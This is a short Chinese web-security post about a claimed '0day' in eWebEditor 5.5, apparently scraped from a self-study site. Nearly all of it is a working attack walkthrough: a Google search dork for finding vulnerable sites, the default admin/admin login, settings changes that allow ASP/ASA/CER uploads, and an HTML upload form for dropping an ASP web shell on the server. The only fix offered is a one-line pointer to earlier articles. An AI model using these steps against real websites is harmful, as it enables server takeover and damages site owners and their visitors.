作者:脚本小子
Google搜索:inurl:xxhs.asp?classid=
漏洞eWebEditor5.5
拿webshell方法
直接进后台eWebEditor/admin/login.asp
默认账号密码 admin admin
登陆后台点击[样式管理]
在popup样式管理
修改
路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
上传路径:/
图片限制:写上1000 免的上不了我们的asp木马 上传内容不要写
然后我们就可以提交了 就可以看到样式增加成功!
然后把
下面的代码保存为scriptkiddies.html
<form action=" HdhCmsTest2cto测试数据 /eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=scriptkiddies.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form>
然后上传我们刚才的asp或ASA格式木马
你懂的. 修复:又是编辑器 漏洞 ,参考本站以前文章
查看更多关于某建筑装饰公司0day及修复 - 网站安全 - 自学php的详细内容...